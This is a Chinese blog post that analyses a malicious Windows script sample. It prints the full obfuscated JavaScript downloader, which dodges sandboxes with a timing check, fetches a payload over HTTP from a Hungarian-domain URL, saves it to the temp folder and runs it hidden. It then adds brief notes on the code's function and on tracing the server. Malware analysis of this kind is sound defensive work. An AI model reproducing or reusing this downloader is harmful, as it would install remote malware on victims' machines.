恶意代码--windows脚本wscript恶意样本逆向分析

最新推荐文章于 2023-05-31 16:51:21 发布
置顶 最新推荐文章于 2023-05-31 16:51:21 发布
阅读量2.8k 收藏 2
点赞数
分类专栏: 二进制 恶意代码 逆向工程 网络安全与恶意代码 文章标签: 安全 测试 脚本 恶意 逆向
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/microzone/article/details/52233649
版权

0x01 基本分析

File: inv_36f5e7.js
Size: 5942 bytes
Modified: 2016年8月17日, 18:54:00
MD5: C533B463D5598971BB32C1F743DDCC00
SHA1: C428931655EDE93A162B347525F5095FA78A454C
CRC32: 8CCB751D


0x02 恶意代码

var oVFDA = "sdf";
var EqgwssuzDk = "i";
var CbMBFrpAenNixzr = "h";
var yZkyvpryerzo = "yau";
var OWfFyitBNfkGS = "sdf";
var EvKJKTni = "g";
var YED = "o";
var vrbkQrmZz = "a7";
var bSsgh = "d8f";
var VYq = "s";
var GqlRwYwyNRjmTXO = "7hg";
var HFaPeXFfQf = "u";
var pGJyKMNeMeSz = "dfa";
var pAHggazU = "aos";
var xeDmnRN = "kj";
var TkioFGwdqECzf = "lf";
var IvPA = "sd;";
var HGddEOIyEGlKqD = "a";
var RbAPg = "sdf";
var DweZT = "i";
var nooWw = "h";
var UOxiWTJeveTmc = "au";
var GGq = "fy";
var CZrdIAVaegI = "gsd";
var xBbxlkaid = "7o";
var xJk = "fa";
var lrrwKaQ = "8";
var tofjOwTTPqM = "gsd";
var jEkcPFPSClJy = "7h";
var dDdBSo = "au";
var MEKSkHWtXrXoq = "df";
var kRtwsMEVOvikhF = "aos";
var konDHgULOMLl = "kj";
var HwhuZGGGz = ";lf";
var QBGEkEyKTteSIFE = "sd";
var dxgAcnIaWaT = "a";
var npimEHxyw = "f";
var gzxAaIuOe = "d";
var glyIl = "is";
var vbXMnALqxJBTr = "uh";
var gfFVKDRDHlxh = "a";
var YRIeFmpyL = "y";
var Hsxi = "sdf";
var NBNVa = "7og";
var DGqwnJBYAr = "a";
var hXk = "d8f";
var YRNkBZkjVUGix = "hgs";
var nJeBUHrKmk = "7";
var BRYybtRzxHbq = "u";
var YnDofAgHjZLXTwL = "fa";
var kaJShal = "d";
var fxOc = "os";
var lKqmYlqyawDnPk = "kja";
var uNcGe = "lf";
var FLQDqhBNnjk = "d;";
var TvLqeh = "as";
var qFo = "e";
var OZGbRIQVppIwJ = "os";
var fDUqIyLO = "cl";
var KIPIrWHXsdgcjhF = "e";
var ofBSJENQVY = "Fil";
var jhmP = "o";
var shE = "eT";
var pCDcoO = "v";
var grHAZU = "Sa";
var ZwBDHN = "n";
var fzL = "o";
var sxFrtUgpGCEifOx = "i";
var HROa = "t";
var Hfuv = "i";
var HhIOUuVwmtFlbtA = "os";
var JSyyTjZmGqBZwN = "p";
var YPpqq = "te";
var uQtDLJnmFzR = "wri";
var zCnbEiZVwMiA = "pe";
var mvqWxpA = "ty";
var zzXzkEpTxO = "en";
var pFLxXyd = "p";
var MTfggvfPTyT = "o";
var KfyjmYkEKyLx = "m";
var aHQYUcaVlUQ = "rea";
var VoFg = "t";
var xTCoqvmVK = "S";
var CNfbwIDnKCJ = ".";
var uYU = "DB";
var fFDMGjDtbjfDF = "O";
var RMplJWcHEVBva = "AD";
var RNCQbKNaOibbTl = "ct";
var EMFHhMe = "je";
var GaeRpeLYCwKeEC = "eOb";
var ACHlTpc = "t";
var biNKioucc = "ea";
var aYSkIHN = "Cr";
var ICjmvAisL = "h4";
var aEr0 = "n4";
var MNnRRgRcnPquuz = "j6";
var YrkHeRxNcrvLD = "0k6";
var GkO = "hu/";
var cpEzVKLF = "l.";
var ZaQRCrwuBRfemMj = "ta";
var nXmUKyNe = "por";
var UcAIGgT = "gy";
var JRGbuChEIxq = "vje";
var UoUZIHURnralKh = "ne";
var ZkWZmYmexUdi = "w.";
var rpdWQwC = "ww";
var AOuPR = "/";
var nLpcsaMNDX = ":/";
var ZTxmNnUJLtPPC = "ttp";
var OxIajXRPSVa = "h";
var yVwM = "GET";
var yFZAdJ = "n";
var STz = "ope";
var onrpWtwXwgwLZP = "e";
var xYlXNtDRSZu = "ex";
var qPstEQFAMJHLr = "t.";
var tNixekYOZqcy = "I";
var YPOKzIhmiBkdG = "qs";
var UcOH = "2Xp";
var CMmsXjM = "m";
var QrywMxwtxaCEC = "%/";
var gIEqprqVOtlKtL = "P";
var SotUSdXog = "EM";
var WvqJvwrjlrY = "%T";
var JTbat = "s";
var PtOsPvJH = "g";
var ViiBnvJlfWUdhl = "in";
var iliEPeW = "tr";
var CmkLzTNEUf = "ntS";
var lkbyPygIhjm = "me";
var BGZCgLI = "ron";
var OQvyGswz = "nvi";
var jATLqdGXmuKKYMM = "E";
var OnCqpejicsbs = "and";
var OgwgCQuslbYE = "p";
var lWDmjSKUCrG = "Ex";
var eSfpjes = "P";
var qiIBBwTIjOPjGi = "HTT";
var jtaGAmHFz = "XML";
var VNpjktQlhr = "2.";
var vExUuOaRJUo = "ML";
var hkQYQQyQIIP = "SX";
var TkqreSKtbpOfyb = "M";
var RQwrKfLavgwJtWC = "un";
var RtQNL = "R";
var CFnecv = "l";
var hxgNojMPu = "l";
var uzMNS = "he";
var fOV = "t.S";
var xXXE = "ip";
var TdlRpCiUZgx = "cr";
var fsCFTGEb = "WS";
var yiiZpVegzCCZf = "t";
var KTtBpdR = "c";
var kePFmBQQenw = "je";
var hFarMMFi = "Ob";
var JqtZh = "e";
var WbHjmwvNlDAiIto = "t";
var vmj = "rea";
var MWhy = "C";
var lewy = new Date();
var JpCLwbk = lewy.getMilliseconds();
WScript.Sleep(10);
var lewy = new Date();
var amtDmXHniaHq = lewy.getMilliseconds();
WScript.Sleep(10);
var lewy = new Date();
var Uwj = lewy.getMilliseconds();
WScript.Sleep(10);
var lewy = new Date();
var YhfbOZ = lewy.getMilliseconds();
var kgea = amtDmXHniaHq - JpCLwbk;
var EqLhv = Uwj - amtDmXHniaHq;
var qxHRARFzWjTBRjC = YhfbOZ - Uwj;
WshShell = WScript[MWhy + vmj + WbHjmwvNlDAiIto + JqtZh + hFarMMFi + kePFmBQQenw + KTtBpdR + yiiZpVegzCCZf](fsCFTGEb + TdlRpCiUZgx + xXXE + fOV + uzMNS + hxgNojMPu + CFnecv);
function urLi(IecREUsCLsZ){WshShell[RtQNL + RQwrKfLavgwJtWC](IecREUsCLsZ, 0, 0);}
function gxUedR(n){return TkqreSKtbpOfyb + hkQYQQyQIIP + vExUuOaRJUo + VNpjktQlhr + jtaGAmHFz + qiIBBwTIjOPjGi + eSfpjes;}
if ((kgea != EqLhv) || (EqLhv != qxHRARFzWjTBRjC)){sSJOsjbTF = WshShell[lWDmjSKUCrG + OgwgCQuslbYE + OnCqpejicsbs + jATLqdGXmuKKYMM + OQvyGswz + BGZCgLI + lkbyPygIhjm + CmkLzTNEUf + iliEPeW + ViiBnvJlfWUdhl + PtOsPvJH + JTbat](WvqJvwrjlrY + SotUSdXog + gIEqprqVOtlKtL + QrywMxwtxaCEC) + CMmsXjM + UcOH + YPOKzIhmiBkdG + tNixekYOZqcy + qPstEQFAMJHLr + xYlXNtDRSZu + onrpWtwXwgwLZP;
 VcmpOhXAkWS = gxUedR(0);
 fgRtFR = WScript.CreateObject(VcmpOhXAkWS);
fgRtFR[STz + yFZAdJ](yVwM, OxIajXRPSVa + ZTxmNnUJLtPPC + nLpcsaMNDX + AOuPR + rpdWQwC + ZkWZmYmexUdi + UoUZIHURnralKh + JRGbuChEIxq + UcAIGgT + nXmUKyNe + ZaQRCrwuBRfemMj + cpEzVKLF + GkO + YrkHeRxNcrvLD + MNnRRgRcnPquuz + aEr0 + ICjmvAisL, false);
fgRtFR.send();
while (fgRtFR.readystate < 4 ) {WScript.Sleep(1000)};
wrZOz = WScript[MWhy + vmj + WbHjmwvNlDAiIto + JqtZh + hFarMMFi + kePFmBQQenw + KTtBpdR + yiiZpVegzCCZf](RMplJWcHEVBva + fFDMGjDtbjfDF + uYU + CNfbwIDnKCJ + xTCoqvmVK + VoFg + aHQYUcaVlUQ + KfyjmYkEKyLx);
wrZOz[STz + yFZAdJ]();
wrZOz[mvqWxpA + zCnbEiZVwMiA] = 1;
wrZOz[uQtDLJnmFzR + YPpqq](fgRtFR.ResponseBody);
wrZOz[JSyyTjZmGqBZwN + HhIOUuVwmtFlbtA + Hfuv + HROa + sxFrtUgpGCEifOx + fzL + ZwBDHN] = 0;
wrZOz[grHAZU + pCDcoO + shE + jhmP + ofBSJENQVY + KIPIrWHXsdgcjhF](sSJOsjbTF, 2 );
wrZOz[fDUqIyLO + OZGbRIQVppIwJ + qFo]();
urLi(sSJOsjbTF);
kgea = "asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + amtDmXHniaHq + JpCLwbk;
EqLhv = "asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + Uwj + amtDmXHniaHq;
qxHRARFzWjTBRjC = "asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + YhfbOZ + Uwj;
}


0x03 还原后的代码


其实编码并不复杂,只是进行了大量的代码数据和字符串替换。

主要功能如下


标准的恶意程序下载者,不懂下载者的可以百度。


关键位置标记,hu.域名。来自匈牙利的国家一级域名。看来是个国外黑客。


0x04 信息追踪


dns查询


whois查询




0x05  其他信息


           搜索有没有其它已披露恶意CC服务器,发现其还有勒索病毒回连。


0x06 参考知识点


http://www.jb51.net/shouce/xmlhttp/
http://www.jb51.net/article/50712.htm

5t4rk
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Andreas Marx:反病毒技术趋势
05-29
9月23-25日,中国规模最大的信息安全专业会议——2013中国互联网安全大会(ISC)在北京国家会议中心举行。AV-Test公司CEO Andreas Marx就反病毒技术趋势这一话题进行了分享。Andreas分享了AV-Test公司检测到的安全威胁数据,在过去半年多的时间内,Andorid平台的恶意软件大幅增长,几乎增长了2倍。
js-analysis:使用SpiderMonkey协助JavaScript恶意软件分析的脚本
05-04
js分析 实现简单的DOM / WScript / ActiveX / PDF对象和功能,以帮助使用SpiderMonkey进行JavaScript恶意软件分析。 版本 0.5 例子 js -f redefine.js -f malware.js -i 使用“ dump()”命令显示所有全局键/值。 笔记! 该代码正在开发中。 请随时分享更新,想法和建议。
VBS基础篇 - wscript 对象详解
08-27
WScript 对象是 Windows 脚本宿主对象模型层次结构的根对象。它可在任何脚本文件中使用,不需要特定的声明
windows2003下使用asp WScript.Shell的设置方法
10-30
windows2000下,IIS默认设置是可以web和可执行程序通信的。但是在2003下IIS关于这方面的服务是禁止的。
恶意弹出1000个cmd命令窗口
01-06
想必在网上经常下到恶意软件吧,改软件就是用c语言编写的一运行就恶意弹出1000个命令窗口
恶意代码--微软jscript程序样本逆向分析
关注互联网安全的小虾米一枚
02-13 2305
信息安全恶意代码分析,钓鱼邮箱附件。
安全防御 --- 恶意代码、防病毒
weixin_62443409的博客
04-05 1万+
硬盘系统分配表扇区(主引导区)、硬盘引导扇区、软盘引导扇区、可执行文件(.exe)、命令文件(.com)、覆盖文件(.ovl)、COMMAND文件、IBMIBO文件、IBMDOS文件。计算机病毒运行染毒的宿主程序,病毒夺取控制权;将病毒程序嵌入感染目标中。
分析恶意代码需要熟知的Windows概念
weixin_51758733的博客
05-31 253
分析恶意代码需要熟知的Windows概念
[安全攻防进阶篇] 一.什么是逆向分析逆向分析应用及经典扫雷游戏逆向
杨秀璋的专栏
07-28 3万+
安全攻防进阶篇将更加深入的去研究恶意样本分析、逆向分析、内网渗透、网络攻防实战等。第一篇文章先带领大家学习什么是逆向分析,然后详细讲解逆向分析的典型应用,接着通过OllyDbg工具逆向分析经典的游戏扫雷,再通过Cheat Engine工具复制内存地址获取,实现一个自动扫雷程序。基础性文章,西电UI您有所帮助~
windows 批处理恶意脚本
04-16 398
:die @start regsvr32.exe /s %windir%\system32\*.* >nul @start %windir%\system32\*.* >nul @start notepad %windir%\explorer.exe >nul goto die 利用windows系统工具造成系统卡死 转载于:https:/...
javascript 恶意代码检测
05-06
一篇关于网页中恶意JavaScript代码的检测,供恶意网页检测 恶意代码检测的研究,论文名是“Detecting Malicious JavaScript Code in Mozilla”
恶意代码分析实例
04-19
恶意代码分析实例 病毒、木马实际案例分析 恶意代码分析实例
Bat反编译工具 v1.0
03-12
Bat反编译工具 v1.0 一款快速的反编译BAT生成的EXE文件
iTunes-bridge:一个macOS和Windows NodeJS程序包,可通过JXA(macOS)或WScriptWindows)从iTunesApple Music应用控制和获取信息
05-13
iTunes桥一个macOS和Windows NodeJS程序包,可通过AppleScript从iTunes和macOS音乐应用程序控制和获取信息如果您需要OS X Mavericks和更早的支持,请使用0.3.0-alpha,但此版本中将没有Windows支持和事件。...
wfh-onwindows:wfh-onwindows
03-10
wfh-onwindows 一个自动启动记事本并每秒钟键入一次字符串的机器人脚本 启动bot双击startbot.vbs 杀死bot双击endbot.bat 代码详细信息: 这是要启动的应用程序 ghost.run "notepad" 脚本将等待/睡眠1秒钟,并在...
免费共享给大家一些免费的代理服务器(包括sock http https)
热门推荐
关注互联网安全的小虾米一枚
11-09 3万+
Last update IP address                 Port Country                    Type               Anonymity 54 secs        116.228.55.217        8000 flag China             HTTP              High +KA
Windows进程间各种通信方式浅谈
关注互联网安全的小虾米一枚
12-05 2万+
1 Windows进程间通信的各种方法 进程是装入内存并准备执行的程序,每个进程都有私有的虚拟地址空间,由代码、数据以及它可利用的系统资源(如文件、管道等)组成。 多进程/多线程是Windows操作系统的一个基本特征。Microsoft Win32应用编程接口(Application Programming Interface, API) 提供了大量支持应用程序间数据共享和交换的机制,这些机
英特尔I217-V网卡驱动安装失败解决方法
关注互联网安全的小虾米一枚
03-10 1万+
估计有些人遇到了英特尔I217-V网卡驱动安装失败的问题。不知所措。 本人使用的windows Server 2008  DataCenter 系统.也是各种百度各种谷歌。 驱动精灵,驱动人生,鲁大师,360驱动各种软件都无法解决该问题、 很多问题,均未得到有效解决。最后在国外一论坛发现解决之法。 以此共享给大家。方便后来人。  具体步骤 1 以管
Python在线爆破邮箱账号密码测试代码(亲测可用)
关注互联网安全的小虾米一枚
11-19 1万+
dic 字典格式如下(mail.txt) : [email protected]:password [email protected]:password [email protected]:password 以此类推,切记保存成utf-8编码格式。 放置在当前脚本目录,也可自己定义修改。 # version 3.4.0 # coding='UTF-8' # time='201
securecrt脚本----vbs语法
最新发布
06-28
VBScript是一种微软开发的脚本语言,它是Visual Basic的一部分,主要用于Windows操作系统上的脚本编写。在SecureCRT中,VBScript语法可以用于编写自动化脚本,实现自动化登录、执行命令、收集输出等功能。常用的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值